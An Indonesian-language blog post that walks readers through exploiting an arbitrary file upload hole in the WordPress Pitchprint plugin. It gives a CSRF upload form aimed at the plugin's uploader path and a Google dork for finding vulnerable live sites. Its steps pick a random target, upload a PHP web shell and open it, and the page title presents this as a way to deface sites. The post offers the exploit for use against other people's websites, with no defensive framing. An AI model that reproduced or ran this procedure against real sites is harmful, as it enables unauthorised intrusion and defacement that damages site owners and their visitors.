Assalamualaikum sobat bloggers :D kali ini ane mau share exploit WordPress Plugins Pitchprint Arbitrary File Upload, langsung saja disimak ;)
Bahan - Bahan :
- Shell : ( Download )
- CSRF
Script CSRF :
<form method="POST" action="http://localhost/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Langkah - Langkah :
1. Buka www.google.com, lalu masukan dork berikut :
inurl:/wp-content/plugins/pitchprint/ ( Kembangin lagi )
2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :
"/wp-content/plugins/pitchprint/uploader/"
4. Jika vuln akan muncul text berikut :
files[]
5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Save, dan buka CSRFnya lalu upload shell kalian
7. Jika sukses upload shell akan seperti gambar dibawah ini :
8. Kalo shellnya berhasil ke upload, tinggal buka deh =))
Shell akses : http://localhost/wp-content/plugins/pitchprint/uploader/files/nama-shell-kalian.php
Sekian tutornya dan Salam Ganteng, Wassalamualaikum wr.wb :D
Deface dengan WordPress Plugins Pitchprint
Diberdayakan oleh Blogger.
0 komentar:
Posting Komentar